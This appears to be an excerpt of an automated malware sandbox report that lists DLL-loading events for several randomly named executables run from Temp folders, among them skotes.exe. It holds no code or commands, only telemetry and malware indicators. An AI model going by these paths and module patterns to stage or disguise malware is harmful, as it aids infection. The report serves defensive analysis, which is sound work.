Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe	Section loaded: winmm.dll
